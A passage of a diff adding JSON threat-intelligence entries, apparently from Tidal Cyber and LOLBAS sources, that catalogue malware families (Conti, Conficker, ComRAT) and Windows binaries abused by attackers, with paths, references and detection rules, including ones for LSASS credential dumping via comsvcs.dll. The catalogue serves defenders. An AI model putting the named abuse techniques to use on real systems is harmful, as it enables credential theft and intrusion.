"type": "used-by" + }, + { + "dest-uuid": "a7881f21-e978-4fe4-af56-92c9416a2616", + "type": "similar" + } + ], + "uuid": "9b6bcbba-3ab4-4a4c-a233-cd12254823f6", + "value": "Cobalt Strike" + }, + { + "description": "This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.[[GitHub random_c2_profile](/references/dcb30328-6aa4-461b-8333-451d6af4b384)] According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5057", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + } + ], + "uuid": "cf47b3ce-1392-4904-a4e6-f65aebebddc6", + "value": "Cobalt Strike Random C2 Profile Generator" + }, + { + "description": "[Cobian RAT](https://app.tidalcyber.com/software/d4e6f9f7-7f4d-47c2-be24-b267d9317303) is a backdoor, remote access tool that has been observed since 2016.[[Zscaler Cobian Aug 2017](https://app.tidalcyber.com/references/46541bb9-15cb-4a7c-a624-48a1c7e838e3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0338", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "aa1462a1-d065-416c-b354-bedd04998c7f", + "type": "similar" + } + ], + "uuid": "d4e6f9f7-7f4d-47c2-be24-b267d9317303", + "value": "Cobian RAT" + }, + { + "description": "[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]", + "meta": { + "id": "ae8da2a7-2ce7-4aa5-8256-1962ec754428", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "49d440e4-b2ea-4e7d-8ded-8589ddf679d9", + "type": "similar" + } + ], + "uuid": "74673d53-5fe4-4e98-ade5-b4a545d2373c", + "value": "code.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VSCode binary, also portable (CLI) version\n\n**Author:** PfiatDe\n\n**Paths:**\n* %LOCALAPPDATA%\\Programs\\Microsoft VS Code\\Code.exe\n* C:\\Program Files\\Microsoft VS Code\\Code.exe\n* C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe\n\n**Resources:**\n* [https://badoption.eu/blog/2023/01/31/code_c2.html](https://badoption.eu/blog/2023/01/31/code_c2.html)\n* [https://code.visualstudio.com/docs/remote/tunnels](https://code.visualstudio.com/docs/remote/tunnels)\n* [https://code.visualstudio.com/blogs/2022/12/07/remote-even-better](https://code.visualstudio.com/blogs/2022/12/07/remote-even-better)\n\n**Detection:**\n* IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com\n* IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe\n* IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\\.vscode-cli\\code_tunnel.json[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5185", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "74673d53-5fe4-4e98-ade5-b4a545d2373c", + "type": "similar" + } + ], + "uuid": "49d440e4-b2ea-4e7d-8ded-8589ddf679d9", + "value": "code" + }, + { + "description": "[CoinTicker](https://app.tidalcyber.com/software/b0d9b31a-072b-4744-8d2f-3a63256a932f) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.[[CoinTicker 2019](https://app.tidalcyber.com/references/99c53143-6f93-44c9-a874-c1b9e4506fb4)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0369", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d1531eaa-9e17-473e-a680-3298469662c3", + "type": "similar" + } + ], + "uuid": "b0d9b31a-072b-4744-8d2f-3a63256a932f", + "value": "CoinTicker" + }, + { + "description": "[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]", + "meta": { + "id": "4719e863-dac0-409d-b6d3-52d7ce388044", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9f006b88-2f13-4c99-ade0-839da70d1e11", + "type": "similar" + } + ], + "uuid": "6044424d-3732-4cac-85a8-b4059f4e0af4", + "value": "Colorcpl.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary that handles color management\n\n**Author:** Arjan Onwezen\n\n**Paths:**\n* C:\\Windows\\System32\\colorcpl.exe\n* C:\\Windows\\SysWOW64\\colorcpl.exe\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1480468728324231172](https://twitter.com/eral4m/status/1480468728324231172)\n\n**Detection:**\n* Sigma: [file_event_win_susp_colorcpl.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml)\n* IOC: colorcpl.exe writing files[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5092", + "source": "Tidal Cyber", + "tags": [ + "884eb1b1-aede-4db0-8443-ba50624682e1", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6044424d-3732-4cac-85a8-b4059f4e0af4", + "type": "similar" + } + ], + "uuid": "9f006b88-2f13-4c99-ade0-839da70d1e11", + "value": "Colorcpl" + }, + { + "description": "[Comnie](https://app.tidalcyber.com/software/341fc709-4908-4e41-8df3-554dae6d72b0) is a remote backdoor which has been used in attacks in East Asia. [[Palo Alto Comnie](https://app.tidalcyber.com/references/ff3cc105-2798-45de-8561-983bf57eb9d9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0244", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e", + "type": "similar" + } + ], + "uuid": "341fc709-4908-4e41-8df3-554dae6d72b0", + "value": "Comnie" + }, + { + "description": "[ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) is a second stage implant suspected of being a descendant of [Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) and used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). The first version of [ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) was identified in 2007, but the tool has undergone substantial development for many years since.[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)][[NorthSec 2015 GData Uroburos Tools](https://app.tidalcyber.com/references/99e2709e-a32a-4fbf-a20a-ffcdd8befdc8)][[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0126", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "da5880b4-f7da-4869-85f2-e0aba84b8565", + "type": "similar" + } + ], + "uuid": "300c5997-a486-4a61-8213-93a180c22849", + "value": "ComRAT" + }, + { + "description": "[[Comsvcs.dll - LOLBAS Project](/references/2eb2756d-5a49-4df3-9e2f-104c41c645cd)]", + "meta": { + "id": "1fa287c7-a4a3-4072-9dd0-ba7b634c0880", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "0448178d-fff1-4174-8339-e6bfca78fb84", + "type": "similar" + } + ], + "uuid": "07f103cf-9a8a-4f68-a96b-877113e6c538", + "value": "Comsvcs.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** COM+ Services\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\comsvcs.dll\n\n**Resources:**\n* [https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/](https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_process_dump_via_comsvcs.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml)\n* Sigma: [proc_access_win_lsass_dump_comsvcs_dll.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* Splunk: [dump_lsass_via_comsvcs_dll.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml)[[Comsvcs.dll - LOLBAS Project](/references/2eb2756d-5a49-4df3-9e2f-104c41c645cd)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5202", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "334b0ee4-5a0d-4634-91c8-236593b818a0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "07f103cf-9a8a-4f68-a96b-877113e6c538", + "type": "similar" + } + ], + "uuid": "0448178d-fff1-4174-8339-e6bfca78fb84", + "value": "Comsvcs" + }, + { + "description": "[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)] ", + "meta": { + "id": "2d9c5a54-c465-46b8-b0f1-9c1e6eb3a4fb" + }, + "related": [ + { + "dest-uuid": "ef33f1fa-18a3-4b30-b359-17b7930f43a7", + "type": "similar" + } + ], + "uuid": "a8d8ea16-3ec8-41bb-a27a-7f67511a78ee", + "value": "Kido" + }, + { + "description": "[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)] ", + "meta": { + "id": "b663e730-924d-4332-ae78-165cd782bb72" + }, + "related": [ + { + "dest-uuid": "ef33f1fa-18a3-4b30-b359-17b7930f43a7", + "type": "similar" + } + ], + "uuid": "2871c307-fede-464e-b25e-ad6051d25c63", + "value": "Downadup" + }, + { + "description": "[Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)] In 2016, a variant of [Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) made its way on computers and removable disk drives belonging to a nuclear power plant.[[Conficker Nuclear Power Plant](https://app.tidalcyber.com/references/83b8c3c4-d67a-48bd-8614-1c703a8d969b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0608", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "type": "similar" + }, + { + "dest-uuid": "a8d8ea16-3ec8-41bb-a27a-7f67511a78ee", + "type": "similar" + }, + { + "dest-uuid": "2871c307-fede-464e-b25e-ad6051d25c63", + "type": "similar" + } + ], + "uuid": "ef33f1fa-18a3-4b30-b359-17b7930f43a7", + "value": "Conficker" + }, + { + "description": "[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]", + "meta": { + "id": "eb5bb379-c403-4f10-8d49-c3d7020d634e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "0e178275-4eb7-4fae-a703-d9730adf6a26", + "type": "similar" + } + ], + "uuid": "45ba655d-a1fc-4305-abed-38f72ef3a832", + "value": "ConfigSecurityPolicy.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.\n\n**Author:** Ialle Teixeira\n\n**Paths:**\n* C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads](https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads)\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads](https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads)\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor](https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor)\n* [https://twitter.com/NtSetDefault/status/1302589153570365440?s=20](https://twitter.com/NtSetDefault/status/1302589153570365440?s=20)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_configsecuritypolicy.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml)\n* IOC: ConfigSecurityPolicy storing data into alternate data streams.\n* IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.\n* IOC: User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\"[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5093", + "source": "Tidal Cyber", + "tags": [ + "d99039e1-e677-4226-8b63-e698d6642535", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "45ba655d-a1fc-4305-abed-38f72ef3a832", + "type": "similar" + } + ], + "uuid": "0e178275-4eb7-4fae-a703-d9730adf6a26", + "value": "ConfigSecurityPolicy" + }, + { + "description": "[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]", + "meta": { + "id": "7829c614-b785-49cf-adf0-21017cd710e4", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0", + "type": "similar" + } + ], + "uuid": "8a24ebd6-9351-4197-8728-6aa45e3dfce3", + "value": "Conhost.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Console Window host\n\n**Author:** Wietze Beukema\n\n**Paths:**\n* c:\\windows\\system32\\conhost.exe\n\n**Resources:**\n* [https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/](https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)\n* [https://twitter.com/Wietze/status/1511397781159751680](https://twitter.com/Wietze/status/1511397781159751680)\n* [https://twitter.com/embee_research/status/1559410767564181504](https://twitter.com/embee_research/status/1559410767564181504)\n* [https://twitter.com/ankit_anubhav/status/1561683123816972288](https://twitter.com/ankit_anubhav/status/1561683123816972288)\n\n**Detection:**\n* IOC: conhost.exe spawning unexpected processes\n* Sigma: [proc_creation_win_conhost_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml)[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5094", + "source": "Tidal Cyber", + "tags": [ + "ea54037d-e07b-42b0-afe6-33576ec36f44", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8a24ebd6-9351-4197-8728-6aa45e3dfce3", + "type": "similar" + } + ], + "uuid": "d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0", + "value": "Conhost" + }, + { + "description": "[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]", + "meta": { + "id": "88e96478-a49a-4cf5-b88d-04221550794d" + }, + "related": [ + { + "dest-uuid": "6f9bb24d-cce2-49de-bedd-1849d9bde7a0", + "type": "similar" + } + ], + "uuid": "0280eeae-b087-48c3-937c-2edf419f6835", + "value": "ScreenConnect" + }, + { + "description": "[ConnectWise](https://app.tidalcyber.com/software/6f9bb24d-cce2-49de-bedd-1849d9bde7a0) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) and [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) to connect to and conduct lateral movement in target environments.[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0591", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "b4d068ac-9b68-4cd8-bf0c-019f910ef8e3", + "type": "used-by" + }, + { + "dest-uuid": "842976c7-f9c8-41b2-8371-41dc64fbe261", + "type": "similar" + }, + { + "dest-uuid": "0280eeae-b087-48c3-937c-2edf419f6835", + "type": "similar" + } + ], + "uuid": "6f9bb24d-cce2-49de-bedd-1849d9bde7a0", + "value": "ConnectWise" + }, + { + "description": "[Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) has been deployed via [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[[Cybereason Conti Jan 2021](https://app.tidalcyber.com/references/3c0e82a2-41ab-4e63-ac10-bd691c786234)][[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)][[Cybleinc Conti January 2020](https://app.tidalcyber.com/references/5ef0ad9d-f34d-4771-a595-7ee4994f6c91)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0575", + "source": "MITRE", + "tags": [ + "0ed7d10c-c65b-4174-9edb-446bf301d250", + "3d90eed2-862d-4f61-8c8f-0b8da3e45af0", + "12a2e20a-7c27-46bb-954d-b372833a9925", + "1b98f09a-7d93-4abb-8f3e-1eacdb9f9871", + "c2380542-36f2-4922-9ed2-80ced06645c9", + "dea4388a-b1f2-4f2a-9df9-108631d0d078", + "24448a05-2337-4bc9-a889-a83f2fd1f3ad", + "2743d495-7728-4a75-9e5f-b64854039792", + "d713747c-2d53-487e-9dac-259230f04460", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "964c2590-4b52-48c6-afff-9a6d72e68908", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "4dea7d8e-af94-4bfb-afe4-7ff54f59308b", + "type": "similar" + } + ], + "uuid": "8e995c29-2759-4aeb-9a0f-bb7cd97b06e5", + "value": "Conti" + }, + { + "description": "[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]", + "meta": { + "id": "4b684811-8f00-4b38-8496-95146a80c07b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "efc46430-b27f-4b05-bc36-1d5eba685ec7", + "type": "similar" + } + ], + "uuid": "94e2981f-681e-4bb8-bcef-98f8ed60f4ed", + "value": "Control.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to launch controlpanel items in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\control.exe\n* C:\\Windows\\SysWOW64\\control.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/](https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/)\n* [https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/](https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/)\n* [https://twitter.com/bohops/status/955659561008017409](https://twitter.com/bohops/status/955659561008017409)\n* [https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items](https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items)\n* [https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/](https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/)\n\n**Detection:**\n* Sigma: [proc_creation_win_exploit_cve_2021_40444.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml)\n* Sigma: [proc_creation_win_rundll32_susp_control_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* Elastic: [defense_evasion_execution_control_panel_suspicious_args.toml](https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* IOC: Control.exe executing files from alternate data streams\n* IOC: Control.exe executing library file without cpl extension\n* IOC: Suspicious network connections from control.exe[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5095", + "source": "Tidal Cyber", + "tags": [ + "53ac2b35-d302-4bdd-9931-5b6c6cb31b96", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "94e2981f-681e-4bb8-bcef-98f8ed60f4ed", + "type": "similar" + } + ], + "uuid": "efc46430-b27f-4b05-bc36-1d5eba685ec7", + "value": "Control" + }, + { + "description": "[CookieMiner](https://app.tidalcyber.com/software/6e2c4aef-2f69-4507-9ee3-55432d76341e) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.[[Unit42 CookieMiner Jan 2019](https://app.tidalcyber.com/references/4605c51d-b36e-4c29-abda-2a97829f6019)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0492", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "type": "similar" + } + ], + "uuid": "6e2c4aef-2f69-4507-9ee3-55432d76341e", + "value": "CookieMiner" + }, + { + "description": "[CORALDECK](https://app.tidalcyber.com/software/f13c8455-d615-4f8d-9d9c-5b31e593cd8a) is an exfiltration tool used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66). [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0212", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "8ab98e25-1672-4b5f-a2fb-e60f08a5ea9e", + "type": "similar" + } + ], + "uuid": "f13c8455-d615-4f8d-9d9c-5b31e593cd8a", + "value": "CORALDECK" + }, + { + "description": "[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]", + "meta": { + "id": "9cb45e94-99bf-46a7-94c5-29d6e5658074", + "owner": "TidalCyberIan", + "owner_id": 